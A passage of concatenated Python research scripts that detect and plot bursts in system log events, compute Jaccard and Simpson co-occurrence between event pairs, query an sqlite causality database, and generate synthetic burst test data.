plt.ylim(0,max(y)*1.05)
plt.grid()
plt.savefig(DUMP_NAME.split('/')[-1].split('.')[0]+'_'+DATE+'.png')
# plt.savefig(DUMP_NAME.split('/')[-1].split('.')[0]+'_'+DATE+'.eps')
def plot_day_comp(DUMP_NAME1, DUMP_NAME2, DATE):
# plot
fig = plt.figure(figsize=(18,10))
#default left : 0.125 right : 0.9 bottom : 0.1 top : 0.9 wspace : 0.2 hspace : 0.2
fig.subplots_adjust(left=0.03,right=0.999, hspace=0.5)
plot_cnt = 1
for DUMP_NAME in [DUMP_NAME1,DUMP_NAME2]:
obj = open_dump(get_dump_path(DUMP_NAME,DATE))
plot_year = int(DATE[:4])
plot_month = int(DATE[4:6])
plot_day = int(DATE[6:8])
plot_date = datetime.date(plot_year,plot_month,plot_day)
plot_data = [row.time() for row in obj if row.date() == plot_date]
plot_data_coll = collections.Counter(plot_data)
x = [row.hour*3600 + row.minute*60 + row.second for row in sorted(set(plot_data))]
y = [0]
for row in sorted(plot_data_coll.items(),key=lambda z:z[0]):
y.append(row[1]+y[-1])
y = y[1:]
x = np.sort(np.append(x,x))[1:]
x = np.insert(x,0,x[0])
tmp = []
for row in y:
tmp.append(row)
tmp.append(row)
y = tmp[:-1]
y = [0] + y
plt.subplot(2,1,plot_cnt)
plt.plot(x, y)
plt.xticks([i*3600 for i in range(25)],[str(i).zfill(2)+':00\n{0}'.format(i*3600) for i in range(25)],rotation=90)
plt.title(DUMP_NAME.split('/')[-1], fontsize=('20'))
plt.xlim(0,86400)
plt.grid()
plot_cnt += 1
plt.savefig(DUMP_NAME1.split('/')[-1].split('.')[0]+'-'+DUMP_NAME2.split('/')[-1].split('.')[0]+'_'+DATE+'.png')
def plot_day_comp_fp(DUMP_NAME1, DUMP_NAME2, DATE, DIRECTION):
if DIRECTION == '1':
title = ['Sorce','Destination']
elif DIRECTION == '0':
title = ['No Direction Ditected','']
else:
title = ['','']
# plot
fig = plt.figure(figsize=(14,12))
#default left : 0.125 right : 0.9 bottom : 0.1 top : 0.9 wspace : 0.2 hspace : 0.2
fig.subplots_adjust(left=0.08,right=0.99, hspace=0.5, bottom=0.13, top=0.95)
plot_cnt = 1
for DUMP_NAME in [DUMP_NAME1,DUMP_NAME2]:
obj = open_dump(get_dump_path(DUMP_NAME,DATE))
plot_year = int(DATE[:4])
plot_month = int(DATE[4:6])
plot_day = int(DATE[6:8])
plot_date = datetime.date(plot_year,plot_month,plot_day)
plot_data = [row.time() for row in obj if row.date() == plot_date]
plot_data_coll = collections.Counter(plot_data)
x = [row.hour*3600 + row.minute*60 + row.second for row in sorted(set(plot_data))]
y = [0]
for row in sorted(plot_data_coll.items(),key=lambda z:z[0]):
y.append(row[1]+y[-1])
y = y[1:]
x = np.sort(np.append(x,x))[1:]
x = np.insert(x,0,x[0])
tmp = []
for row in y:
tmp.append(row)
tmp.append(row)
y = tmp[:-1]
y = [0] + y
x = np.insert(x,0,0)
x = np.append(x,86399)
y = [0,] + y + [y[-1]]
# plt.subplot(2,1,plot_cnt)
ax = fig.add_subplot(2,1,plot_cnt)
plt.plot(x, y)
plt.xticks([i*3600 for i in range(25)],[str(i).zfill(2)+':00' for i in range(25)],rotation=90,fontsize=15)
plt.xlabel('Time',fontsize=('20'))
ax.xaxis.set_label_coords(0.5, -0.25)
plt.yticks(fontsize=15)
plt.ylabel('Cumulative Count',fontsize=('20'))
plt.title(title[plot_cnt-1], fontsize=('20'))
plt.xlim(0,86400)
plt.grid()
plot_cnt += 1
plt.savefig(DUMP_NAME1.split('/')[-1].split('.')[0]+'-'+DUMP_NAME2.split('/')[-1].split('.')[0]+'_'+DATE+'.png')
if __name__ == '__main__':
if len(sys.argv) < 3:
print('usage')
print('Plot:\t\tpython plot_day.py event 20120101')
print('For Paper plot:\tpython plot_day.py event 20120101 p')
print('Double plot:\tpython plot_day.py event1 event2 20120101')
exit()
if len(sys.argv) == 4 and sys.argv[-1] == 'p':
# for paper fig plot
DUMP_NAME = sys.argv[1]
DATE = sys.argv[2]
plot_day_fp(DUMP_NAME, DATE)
elif len(sys.argv) == 4 and sys.argv[-1] == 'old':
DUMP_NAME = sys.argv[1]
DATE = sys.argv[2]
plot_day_old(DUMP_NAME, DATE)
elif len(sys.argv) == 4:
DUMP_NAME1 = sys.argv[1]
DUMP_NAME2 = sys.argv[2]
DATE = sys.argv[3]
plot_day_comp(DUMP_NAME1, DUMP_NAME2, DATE)
elif len(sys.argv) == 5:
DUMP_NAME1 = sys.argv[1]
DUMP_NAME2 = sys.argv[2]
DATE = sys.argv[3]
plot_day_comp_fp(DUMP_NAME1, DUMP_NAME2, DATE, sys.argv[4])
else:
DUMP_NAME = sys.argv[1]
DATE = sys.argv[2]
plot_day(DUMP_NAME, DATE)
--- FILE SEPARATOR ---
import sqlite3
import sys
argv = sys.argv[1:]
conn = sqlite3.connect('s4causality.db')
cur = conn.cursor()
query='select date from date where pairID in(select pairID from event where (srcID={0} and srcHost="{1}" and dstID={2} and dstHost="{3}") or (srcID={2} and srcHost="{3}" and dstID={0} and dstHost="{1}"));'.format(argv[0],argv[1],argv[2],argv[3])
cur.execute(query)
for i in cur.fetchall():
print("".join(i[0].split("-")))
# query='select * from event where (srcID={0} and srcHost="{1}" and dstID={2} and dstHost="{3}") or (srcID={2} and srcHost="{3}" and dstID={0} and dstHost="{1}");'.format(argv[0],argv[1],argv[2],argv[3])
#
# cur.execute(query)
#
# for i in cur.fetchall():
# print(i)
--- FILE SEPARATOR ---
# coding=utf-8
'''
search burst.py
'''
import collections
import datetime
import pickle
import numpy as np
import pandas as pd
import sys
import matplotlib
import matplotlib.pyplot as plt
# import seaborn as sns
def print_full(x):
pd.set_option('display.max_rows', len(x))
pd.set_option('display.max_columns', len(x.columns))
print(x)
pd.reset_option('display.max_rows')
pd.reset_option('display.max_columns')
def open_dump(dump_file):
with open(dump_file, "rb") as f:
obj = pickle.load(f, encoding="bytes")
return obj
def search_burst(burst_df):
'''
search_burst(pd.DataFrame burst_df)
return co_burst_results = dict{
key = key_event,
value = dict{key = co_event,
value = cnt}
}
'''
co_burst_results = collections.defaultdict(lambda: 0)
for day_series in burst_df.iterrows():
day_series = day_series[1].dropna()
for cur_event, cur_values in day_series.iteritems():
rel_event = []
for cur in cur_values:
cur_st = cur[1]
for tar_event, tar_values in day_series.iteritems():
if tar_event == cur_event:
continue
for tar in tar_values:
tar_st = tar[1]
if cur_st - 60 < tar_st < cur_st + 60:
rel_event.append(tar_event)
break # cur_event1つにつき関連eventは重複して数えない
if co_burst_results[cur_event] == 0:
co_burst_results[cur_event] = collections.Counter(rel_event)
else:
print('ck')
co_burst_results[cur_event] += collections.Counter(rel_event)
return co_burst_results
def calc_jaccard(AandB, A, B):
AorB = A + B - AandB
if AorB == 0:
return 1.0
else:
prb = AandB / AorB
if prb > 1. :
prb = 1.
return prb
def calc_simpson(AandB, A, B):
prb = AandB / min(A,B)
if prb > 1. :
prb = 1.
return prb
def calc_co_prob(host_bursts, cur_event, co_result):
cur_all = host_bursts[cur_event]
co_prob_result = pd.DataFrame(columns=['x','y_jaccard','y_simpson'])
for co_event, co_cnt in co_result:
new_line = pd.Series(name=co_event, index=['x','y_jaccard','y_simpson'])
new_line['x'] = host_bursts[co_event]
co_event_all = host_bursts[co_event]
new_line['y_jaccard'] = calc_jaccard(co_cnt, cur_all, co_event_all)
new_line['y_simpson'] = calc_simpson(co_cnt, cur_all, co_event_all)
co_prob_result = co_prob_result.append(new_line)
return co_prob_result
def calc_co_prob_all(host_bursts, co_burst_results):
event_set = []
co_prob_result = pd.DataFrame(columns=['EvPair', 'x', 'y_jaccard', 'y_simpson'])
for cur_event, co_result in co_burst_results.items():
cur_all = host_bursts[cur_event]
for co_event, co_cnt in co_result.items():
if {cur_event, co_event} in event_set:
continue
if co_burst_results[co_event][cur_event] > co_cnt: #もし関連event側からみて&が多かったら入れ替え
co_cnt = co_burst_results[co_event][cur_event]
# else:
event_set.append({cur_event, co_event})
co_all = host_bursts[co_event]
new_line = pd.Series(index=['EvPair', 'x', 'y_jaccard', 'y_simpson'])
new_line['EvPair'] = (cur_event, co_event)
new_line['x'] = co_all + cur_all - co_cnt
new_line['y_jaccard'] = calc_jaccard(co_cnt, cur_all, co_all)
new_line['y_simpson'] = calc_simpson(co_cnt, cur_all, co_all)
if new_line['y_jaccard'] > 1 or new_line['y_simpson'] > 1:
print(new_line, co_all, cur_all, co_cnt)
co_prob_result = co_prob_result.append(new_line, ignore_index=True)
return co_prob_result
def host_burst_cnt(burst_df):
'''
host_burst_cnt(pd.DataFrame burst_df)
returns = dict{key=event, value=all_cnt}
'''
returns = collections.defaultdict(lambda: 0)
columns = burst_df.columns
for event in columns:
all_cnt = sum([len(i) for i in burst_df.loc[:, event].dropna()])
returns[event] = all_cnt
return returns
def co_plot(cur_event, co_prob_result):
if len(co_prob_result) == 0 :
return 0
fig = plt.figure()
plt.style.use('ggplot')
# fig.subplots_adjust(left=0.03,right=0.995)
co_prob_result['y_jaccard'] = co_prob_result['y_jaccard'] * (10 ** 5 )
co_prob_result.plot(kind='scatter',x='x', y='y_jaccard', figsize=(9,9))
plt.title(cur_event, fontsize='20')
plt.xscale("log")
plt.yscale("log")
plt.xticks(fontsize='15')
# plt.xlabel(fontsize='15')
plt.yticks([10 ** i for i in range(1,6)],
['$1.0^{-4}$','$1.0^{-3}$','$1.0^{-2}$','$1.0^{-1}$','1.0'],
fontsize='15')
# plt.ylabel(fontsize='15')
plt.ylim(1., 10. ** 5 + 10 ** 4)
plt.grid(b=True, which='major',lw='1', color='gray')
plt.grid(b=True, which='minor', linestyle='--', color='white')
plt.savefig('{0}_jaccard.png'.format(cur_event))
def co_plot_all(co_prob_result):
if len(co_prob_result) == 0 :
return 0
fig = plt.figure()
plt.style.use('ggplot')
# fig.subplots_adjust(left=0.03,right=0.995)
plot_cnt = 1
# co_prob_result.plot(subplots=True,layout=(1,3))
fig, axes = plt.subplots(nrows=1,ncols=2)
for kind in ['jaccard','simpson']:
# plt.subplot(1,2,plot_cnt)
co_prob_result['y_{0}'.format(kind)] = co_prob_result['y_{0}'.format(kind)] * (10 ** 5 )
# co_prob_result['y_simpson'] = co_prob_result['y_simpson'] * (10 ** 5 )
co_prob_result.plot(kind='scatter',x='x', y='y_{0}'.format(kind), figsize=(9,9))
# co_prob_result.plot(kind='scatter', figsize=(9,9), subplots= True, layout=(1,2), x='x', y ='y_jaccard')
# plt.xscale("log")
plt.yscale("log")
plt.xticks(fontsize='15')
plt.yticks([10 ** i for i in range(1,6)],
['$1.0^{-4}$','$1.0^{-3}$','$1.0^{-2}$','$1.0^{-1}$','1.0'],
fontsize='15')
# plt.yticks(fontsize='15')
plt.ylim(1., 10. ** 5 + 10 ** 4)
# plt.ylim(-1000, 10. ** 5 + 10 ** 4)
plt.grid(b=True, which='major',lw='1', color='gray')
plt.grid(b=True, which='minor', linestyle='--', color='white')
plot_cnt += 1
plt.savefig('{0}_all.png'.format(kind))
def co_plot_all_fp(co_prob_result):
if len(co_prob_result) == 0 :
return 0
plot_cnt = 1
for kind in ['jaccard','simpson']:
fig = plt.figure(figsize=(10,6))
ax = fig.add_subplot(111)
fig.subplots_adjust(top=0.95, bottom=0.15, left=0.15)
co_prob_result['y_{0}'.format(kind)] = co_prob_result['y_{0}'.format(kind)] * (10 ** 5 )
x=co_prob_result['x'].values
y=co_prob_result['y_{0}'.format(kind)].values
plt.scatter(x,y, marker='.', c=None)
plt.yscale("log")
plt.xticks(fontsize='18')
plt.yticks([10 ** i for i in range(1,6)],
['$1.0^{-4}$','$1.0^{-3}$','$1.0^{-2}$','$1.0^{-1}$','1.0'],
fontsize='25')
plt.ylim(1., 10. ** 5 + 10 ** 4)
plt.grid()
plt.xlabel(r'$|A \cup B|$', fontsize='23')
ax.xaxis.set_label_coords(0.5, -0.13)
if plot_cnt==1:
ax.set_ylabel(r'$J(A,B)$', fontsize='23')
else:
ax.set_ylabel(r'$S(A,B)$', fontsize='23')
ax.yaxis.set_label_coords(-0.15, 0.5)
plt.savefig('{0}_nofilter.eps'.format(kind))
plot_cnt += 1
if __name__ == "__main__":
if len(sys.argv) == 2:
burst_df = open_dump(sys.argv[1])
ind = burst_df.index
host_bursts = host_burst_cnt(burst_df)
co_burst_results = search_burst(burst_df)
co_prob_result = calc_co_prob_all(host_bursts, co_burst_results)
co_prob_result = co_prob_result.sort_values(by='y_jaccard', ascending=False)
with open('co_prob_df','wb') as f:
pickle.dump(co_prob_result,f)
co_plot_all(co_prob_result)
# print_full(co_prob_result.sort_values(by='b', ascending=False))
exit()
for cur_event, co_result in co_burst_results.items():
co_result = sorted(co_result.items(),
key=lambda x: x[1],
reverse=True)
co_prob_result = calc_co_prob(host_bursts, cur_event, co_result)
print('\nind:',cur_event,host_bursts[cur_event])
print_full(co_prob_result)
co_plot(cur_event,co_prob_result)
else:
co_prob_result = open_dump(sys.argv[2])
print_full(co_prob_result)
co_plot_all(co_prob_result)
--- FILE SEPARATOR ---
import pickle
import datetime
import sys
import glob
import collections
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import math
# import search_burst as sb
def open_dump(dump_file):
with open(dump_file,"rb") as f:
obj = pickle.load(f, encoding="bytes")
return obj
def get_ids(host,get_date):
# 特定日の特定ホストのIDを全部取得
ids = []
for i in glob.glob('dumps/{0}/*_{1}'.format(get_date,host)):
ids.append((i.split("/")[-1].split("_")[0],len(open_dump(i))))
sorted(ids,key=lambda x:x[1],reverse=True)
return ids
if __name__ == "__main__":
get_dates = [i.split('/')[-1] for i in glob.glob('dumps_host/*')]
colors = ['red','orange','y','lightgreen','green','lightblue','blue','purple','gray','black']
bursts = open_dump('burst_df')
dump_result = []
# 全日付で回す
for get_date in get_dates:
print(get_date)
# 日付に該当する全ホストで回す
for host in [i.split('/')[-1].split('_')[-1] for i in glob.glob('dumps_host/{0}/*'.format(get_date))]:
# 日付,ホストに該当するIDを全部取得
ids = get_ids(host,get_date)
# 特定日の特定ホストベースでバーストが検知されてたら
if len(open_dump('burst_result_host/{0}/{1}'.format(get_date,get_date+'_'+host)))==3:
filename, filedatem, h_burst = open_dump('burst_result_host/{0}/{1}'.format(get_date,get_date+'_'+host))
# ホストのバーストのst,en
h_st_ens = [(i[1],i[2]) for i in h_burst]
# 全部のIDのバーストのst,enを取得
st_ens = []
for id_,c in ids:
bs = bursts[str(id_)+'_'+host][get_date]
if type(bs) == list:
for b in bs:
st_ens.append((b[1],b[2]))
# ホストのバーストに対してデバイスのバースト期間と被りがあるものは除外
result = []
for h_st,h_en in h_st_ens:
flag=0
for st,en in st_ens:
if h_st <= en and h_en >= st:#かぶりがあるなら
flag=1
break
if flag == 0 :#被りがなかったら残す
result.append((h_st,h_en))
# 日付とホストごとに残ったバーストを記録
if result != []:
dump_result.append((host,get_date,result))
# dump
with open('host_burst_df','wb') as f:
pickle.dump(dump_result,f)
--- FILE SEPARATOR ---
#!/usr/bin/python
import numpy as np
import pandas as pd
import datetime
import search_burst as sb
import plot_day
import pickle
import search_burst as sb
import sqlite3
import collections
'''
相似形のものかどうか判別
'''
def cnt_logs(DUMP_NAME,DATE):
obj = sb.open_dump('dumps/'+str(DATE)+'/'+DUMP_NAME)
return(len(obj))
def get_eday(evp):
argv = []
argv.extend(evp[0].split("_"))
argv.extend(evp[1].split("_"))
query='select date from date where pairID in(select pairID from event where (srcID={0} and srcHost="{1}" and dstID={2} and dstHost="{3}") or (srcID={2} and srcHost="{3}" and dstID={0} and dstHost="{1}"));'.format(argv[0],argv[1],argv[2],argv[3])
cur.execute(query)
r = cur.fetchall()
result = []
for i in r:
result.append("".join(i[0].split("-")))
return result
def get_log(DUMP_NAME,DATE):
obj = sb.open_dump('dumps/'+str(DATE)+'/'+DUMP_NAME)
return(obj)
def check_synm(evp,anddays):
res1 = []
res2 = []
for day in anddays:
ev1 = get_log(evp[0],day)
lev1 = len(ev1)
ev2 = get_log(evp[1],day)
lev2 = len(ev2)
ev1 = collections.Counter([i.strftime('%H%M') for i in ev1])
# lev1 = ev1.most_common(1)[0][1]
ev2 = collections.Counter([i.strftime('%H%M') for i in ev2])
# lev2 = ev2.most_common(1)[0][1]
ev1s = {k:int(v/lev1*100) for k,v in ev1.items()}
ev2s = {k:int(v/lev2*100) for k,v in ev2.items()}
# print(ev1s);exit()
if evp[0] == '117_tokyo-dc-rm' and evp[1] == '116_tokyo-dc-rm':
print(ev1,ev2)
print(ev1s,ev2s)
res1.append(ev1==ev2)
res2.append(ev1s==ev2s)
return any(res1),any(res2)
if __name__ == "__main__":
dbname = 's4causality.db'
conn = sqlite3.connect(dbname)
cur = conn.cursor()
edge_burst = sb.open_dump('rp_edge_coburst')
print(len(edge_burst))
burst = sb.open_dump('burst_df')
burst_ev = [x for x in burst.columns if len(burst[x].dropna()) != 0]
result = []
for evp in edge_burst['EvPair']:
bday1 = burst[evp[0]].dropna().index.values
bday1 = [str(x).split('T')[0].replace("-","") for x in bday1]
bday2 = burst[evp[1]].dropna().index.values
bday2 = [str(x).split('T')[0].replace("-","") for x in bday2]
bday = list(set(bday1) & set(bday2))
eday = get_eday(evp)
if len(set(bday) & set(eday)) != 0:
anddays = list(set(bday) & set(eday))
res1,res2 = check_synm(evp,anddays)
result.append((evp,anddays,res1,res2))
# print(result)
with open('burst_burst_synm_min','wb') as f:
pickle.dump(result,f)
conn.close()
exit()
--- FILE SEPARATOR ---
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import pickle
import sys
import datetime
import collections
values = []
dn_list = []
for dn in sys.argv[1:]:
DUMP_NAME = dn
dn_list.append(dn.split('/')[-1])
with open(DUMP_NAME,"rb") as f:
obj = pickle.load(f, encoding="bytes")
tmp = set( [datetime.datetime(row.year,row.month,row.day) for row in obj ] )
x = sorted(list(tmp))
print(dn,'\t',x[0],x[-1])
--- FILE SEPARATOR ---
#!/usr/bin/python
# coding: UTF-8
import sys
import sqlite3
import time
import re
import os.path
import tqdm
import random
import tqdm
'''
syth testdata
24h, 30 - 1,500 count
'''
PARSE_CHAR = ['(',')','[',']','=']
DBNAME = 'test.db'
#word split by space and parse char
def word_split(log):
w = list(log)
for (i,word) in enumerate(w):
if word in PARSE_CHAR:
w[i] = ' ' + w[i] + ' '
w = ''.join(w)
w = re.split(' +',w)
if w[-1] == '':
w = w[:-1]
return w[MSG_OFFSET:]
#get format from db
#return: ft = [[group id, format]]
def get_ft():
dbname = sys.argv[1]
con = sqlite3.connect(dbname)
cur = con.cursor()
cur.execute("""select * from format""")
data = cur.fetchall()
data = [ [data[i][0],data[i][1].strip() ] for i in range(len(data)) ]
con.commit()
con.close()
return data
#compare format and log
#return: 0 -> match, other -> not match
def compare_f(log,fmt):
l = word_split(log)
f = fmt.split()
if len(l) != len(f):#まず長さで評価
return 1
flag = 0
for (lw,fw) in zip(l,f):
if fw == '*':
continue
elif lw != fw:
flag +=1
return flag
#get time stamp(sec) from log
def get_time_sec(log):
time_stamp = log.split()[TIME_OFFSET].split(':')
time_sec = int(time_stamp[0])*60*60+int(time_stamp[1])*60+int(time_stamp[2])
return time_sec
def sec2time(sec):
return str(int(sec/3600)).zfill(2)+':'+str(int(sec%3600/60)).zfill(2)+':'+str(int(sec%3600%60)).zfill(2)
def insert_db(ind,msg,time_sec):
con = sqlite3.connect(DBNAME)
cur = con.cursor()
cur.execute("""drop table if exists '{0}' """.format(ind))
cur.execute("""create table if not exists '{0}' (id integer primary key,time integer,log text)""".format(ind))
cur.execute("""insert into format(id,f) values ({0},'{1}');""".format(ind,msg))
for time_stamp in time_sec:
cur.execute("""insert into '{0}'(time,log) values ({1},'{2}');""".format(ind,time_stamp,msg))
con.commit()
con.close()
if __name__ == '__main__':
#initialize
con = sqlite3.connect(DBNAME)
cur = con.cursor()
cur.execute("""drop table if exists format """)
cur.execute("""create table if not exists format(id integer,f text)""")
con.commit()
con.close()
#group_log_list: {group id : log}
# group_log_list = {k:[] for k in range(1,20)}
ind = 1
start_time = random.randint(0,60*60*24 - 60*5)
msg = 'Burst: 5min({0}-{1}) 1000cnt burst points'.format(sec2time(start_time),sec2time(start_time+60*5))
time_sec = []
for i in range(1000):
time_sec.append(random.randint(start_time,start_time+60*5))
time_sec = sorted(time_sec)
insert_db(ind,msg,time_sec)
ind += 1
'''
msg = 'Period: 5min period'
time_sec = [x * 60 * 5 for x in range( int( 60*60*24 / (60*5) ) ) ]
insert_db(ind,msg,time_sec)
ind += 1
msg = 'Period: 10min period'
time_sec = [x * 60 * 10 for x in range( int( 60*60*24 / (60*10) ) ) ]
insert_db(ind,msg,time_sec)
ind += 1
msg = 'Period: 15min period'
time_sec = [x * 60 * 15 for x in range( int( 60*60*24 / (60*15) ) ) ]
insert_db(ind,msg,time_sec)
ind += 1
msg = 'Period: 20min period'
time_sec = [x * 60 * 20 for x in range( int( 60*60*24 / (60*20) ) ) ]
insert_db(ind,msg,time_sec)
ind += 1
msg = 'Period: 30min period'
time_sec = [x * 60 * 30 for x in range( int( 60*60*24 / (60*30) ) ) ]
insert_db(ind,msg,time_sec)
ind += 1
msg = 'Period: 7min period'
time_sec = [x * 60 * 7 for x in range( int( 60*60*24 / (60*7) ) ) ]
insert_db(ind,msg,time_sec)
ind += 1
'''
# msg = 'Period: 5min period with some irregular point'
# time_sec = [x * 60 * 60 for x in range( int( 60*60*24 / (60*60) ) ) ]
# # for i in range(30):
# # time_sec[random.randint(0,len(time_sec)-1)] += 2
# insert_db(ind,msg,time_sec)
# ind += 1
'''
msg = 'Period: 30min period with some irregular point'
time_sec = [x * 60 * 30 for x in range( int( 60*60*24 / (60*30) ) ) ]
for i in range(5):
time_sec[random.randint(0,len(time_sec)-1)] += 2
insert_db(ind,msg,time_sec)
ind += 1
msg = 'Period: 60min period with some irregular point'
time_sec = [x * 60 * 60 for x in range( int( 60*60*24 / (60*60) ) ) ]
for i in range(3):
time_sec[random.randint(0,len(time_sec)-1)] += 2
insert_db(ind,msg,time_sec)
ind += 1
start_time = random.randint(0,60*60*24 - 60*5)
msg = 'Burst: 5min({0}-{1}) 1000cnt burst points'.format(sec2time(start_time),sec2time(start_time+60*5))
time_sec = []
for i in range(1000):
time_sec.append(random.randint(start_time,start_time+60*5))
time_sec = sorted(time_sec)
insert_db(ind,msg,time_sec)
ind += 1
start_time = random.randint(0,60*60*24 - 60*10)
change_time = start_time + int(60*8)
msg = 'Burst: 10min({0}-{1}) 1000cnt burst points with trend change {2}'.format(sec2time(start_time),sec2time(start_time+60*10),sec2time(change_time))
time_sec = []
for i in range(1000):
time_sec.append(random.randint(start_time,change_time))
for i in range(4000):
time_sec.append(random.randint(change_time,start_time+60*10))
time_sec = sorted(time_sec)
insert_db(ind,msg,time_sec)
ind += 1
start_time = random.randint(0,60*60*24 - 60*10)
msg = 'Random: 10 / 1h'
time_sec = []
for i in range(24):
for j in range(10):
time_sec.append(random.randint(i*60*60,(i+1)*60*60))
time_sec = sorted(time_sec)
insert_db(ind,msg,time_sec)
ind += 1
start_time = random.randint(0,60*60*24 - 60*5)
msg = 'Period Burst: 10min period with one burst point 5min({0}-{1})'.format(sec2time(start_time),sec2time(start_time+60*5))
time_sec = [x * 60 * 10 for x in range( int( 60*60*24 / (60*10) ) ) ]
for i in range(1000):
time_sec.append(random.randint(start_time,start_time+60*5))
time_sec = sorted(time_sec)
insert_db(ind,msg,time_sec)
ind += 1
start_time1 = random.randint(0,60*60*24 - 60*5)
start_time2 = random.randint(0,60*60*24 - 60*5)
start_time3 = random.randint(0,60*60*24 - 60*5)
msg = 'Period Burst: 10min period with 3 burst points 5min({0}-{1},{2}-{3},{4}-{5})'.format(sec2time(start_time1),sec2time(start_time1+60*5),sec2time(start_time2),sec2time(start_time2+60*5),sec2time(start_time3),sec2time(start_time3+60*5))
time_sec = [x * 60 * 10 for x in range( int( 60*60*24 / (60*10) ) ) ]
for i in range(1000):
time_sec.append(random.randint(start_time1,start_time1+60*5))
time_sec.append(random.randint(start_time2,start_time2+60*5))
time_sec.append(random.randint(start_time3,start_time3+60*5))
time_sec = sorted(time_sec)
insert_db(ind,msg,time_sec)
ind += 1
start_time = random.randint(0,60*60)
msg = 'Period Burst: 10min period with 30min period burst points 5min({0}-{1})'.format(sec2time(start_time1),sec2time(start_time1+60*5))
time_sec = [x * 60 * 10 for x in range( int( 60*60*24 / (60*10) ) ) ]
for _ in range(int((60*60*24-start_time)/(60*30))):
for i in range(1000):
time_sec.append(random.randint(start_time,start_time+60*5))
start_time += 60*30
time_sec = sorted(time_sec)
insert_db(ind,msg,time_sec)
ind += 1
'''
#
# while(ind<10):
# start_time1 = random.randint(0,60*60*24 - 60*10)
# start_time2 = random.randint(0,60*60*24 - 60*10)
# start_time3 = random.randint(0,60*60*24 - 60*10)
# msg = 'Random Burst: 100 / 1h with 3 burst point 5min({0}-{1},{2}-{3},{4}-{5})'.format(sec2time(start_time1),sec2time(start_time1+60*10),sec2time(start_time2),sec2time(start_time2+60*10),sec2time(start_time3),sec2time(start_time3+60*10))
# time_sec = []
# for i in range(24):
# for j in range(100):
# time_sec.append(random.randint(i*60*60,(i+1)*60*60-1))
# for i in range(1000):
# time_sec.append(random.randint(start_time1,start_time1+60*10))
# for i in range(1000):
# time_sec.append(random.randint(start_time2,start_time2+60*10))
# for i in range(1000):
# time_sec.append(random.randint(start_time3,start_time3+60*10))
# time_sec = sorted(time_sec)
# insert_db(ind,msg,time_sec)
# ind += 1
'''
msg = 'Period: 60min period with a lack point'
time_sec = [x * 60 * 60 for x in range( int( 60*60*24 / (60*60) ) ) ]
del(time_sec[random.randint(0,len(time_sec)-1)])
insert_db(ind,msg,time_sec)
ind += 1
start_time1 = random.randint(0,60*60*24 - 60*10)
start_time2 = random.randint(0,60*60*24 - 60*10)
start_time3 = random.randint(0,60*60*24 - 60*10)
msg = 'Burst: 10min burst with 3 different size burst points 5min({0}-{1},{2}-{3},{4}-{5})'.format(sec2time(start_time1),sec2time(start_time1+60*10),sec2time(start_time2),sec2time(start_time2+60*10),sec2time(start_time3),sec2time(start_time3+60*10))
time_sec = []
for i in range(2000):
time_sec.append(random.randint(start_time1,start_time1+60*10))
for i in range(2000):
time_sec.append(random.randint(start_time2,start_time2+60*10))
for i in range(2000):
time_sec.append(random.randint(start_time3,start_time3+60*10))
time_sec = sorted(time_sec)
insert_db(ind,msg,time_sec)
ind += 1
'''
'''
1 2 3 5
100 500 1000 2000 3000
1min 3min 5min 10min
'''
#
# #回数(3)、サイズ(3000)、期間(5)をランダムに
# # counts = [1,2,3,5]
# # sizes = [100,500,1000,2000,3000]
# # lengths = [1,3,5,10]
# counts = [1,2,3]
# denses = [0.1,1.0,10,100]
# lengths = [10,60,120,180]
#
#
# for count in counts:
# for dens in denses:
# for length in lengths:
# cur = 0
# while(True):
# # start_time = [random.randint(0,60*60*24 - 60*length) for _ in range(10)]
# start_time = [72000,43200,14400]
# time_sec = []
# for i in range(count):
# for _ in range(int(dens*length)):
# time_sec.append(random.randint(start_time[i],start_time[i]+60*length))
#
# for i in range(24):
# for _ in range(4):
# time_sec.append(random.randint(i*60*60,(i+1)*60*60-1))
#
# time_sec = sorted(time_sec)
# msg = 'Burst: cnt {0} '.format(count)
# for i in range(count):
# msg += 'length {0} dens {1} ({2}-{3}) '.format(length,dens,sec2time(start_time[i]),sec2time(start_time[i]+60*length))
# insert_db(ind,msg,time_sec)
# ind += 1
# cur += 1
# print(ind)
# if cur == 10:
# break
#回数(1,2,3,5)、密度(100,500,1000,2000,3000)、期間(1,3,5,10)を全パターン10回ずつ,with random
# counts = [1,2,3]
# denses = [0.1,1.0,10,100]
# lengths = [10,60,120,180]
# random_rates = [100]
# random_rates = [1,3,10]
counts = [1]
denses = [100]
lengths = [180]
random_rates = [0]
for random_rate in random_rates:
for count in counts:
for dens in denses:
for length in lengths:
cur = 0
while(True):
start_time = [72000,43200,14400]
time_sec = []
for i in range(count):
for _ in range(int(dens*length)):
time_sec.append(random.randint(start_time[i],start_time[i]+60*length))
for i in range(24):
for j in range(random_rate):
time_sec.append(random.randint(i*60*60,(i+1)*60*60-1))
# time_sec.append(1258)
#
# for i in range(1,15):
# time_sec.append(1258+5053*i)
time_sec = sorted(time_sec)
msg = 'Burst: {0} random {1} '.format(count,random_rate)
for i in range(count):
msg += 'length {0} dens {1} ({2}-{3})'.format(length,dens,sec2time(start_time[i]),sec2time(start_time[i]+60*length))
insert_db(ind,msg,time_sec)
ind += 1
cur += 1
print(count)
# if cur == 10:
if cur == 1:
break
# #回数(1,2,3,5)、密度(100,500,1000,2000,3000)、期間(1,3,5,10)を全パターン10回ずつwith period
# counts = [1,2,3]
# denses = [0.1,1.0,10,100]
# lengths = [10,60,120,180]
# periods = [3,5,10,30,60,120]
# for count in counts:
# for dens in denses:
# for length in lengths:
# for period in periods:
# cur = 0
# while(True):
# # if count >= 2 and lengths == 480:
# # break
#
# start_time = [72000,43200,14400]
#
# if period != 0:
# time_sec = [x * 60 * period for x in range( int( 60*60*24 / (60*period) ) ) ]
# else:
# time_sec = []
#
# for i in range(count):
# for _ in range(int(dens*length)):
# time_sec.append(random.randint(start_time[i],start_time[i]+60*length))
#
# time_sec = sorted(time_sec)
#
# msg = 'Burst: {0} period {1} '.format(count,period)
# for i in range(count):
# msg += '{0} min, dens {1} ({2}-{3}) '.format(length,dens,sec2time(start_time[i]),sec2time(start_time[i]+60*length))
# insert_db(ind,msg,time_sec)
# ind += 1
# cur += 1
# print(ind)
# if cur == 10:
# break
# #周期(3-70min),irregular point(全体の20%以下、+-3秒)
# periods = [3,5,7,10,15,30,60,90]
# # irregular_rates = [0.0,0.1,0.2,0.3,0.4,0.5]
# noizes = [0.0,0.1,0.3,0.5,0.8]
# for period in periods:
# for noize in noizes:
# count = 0
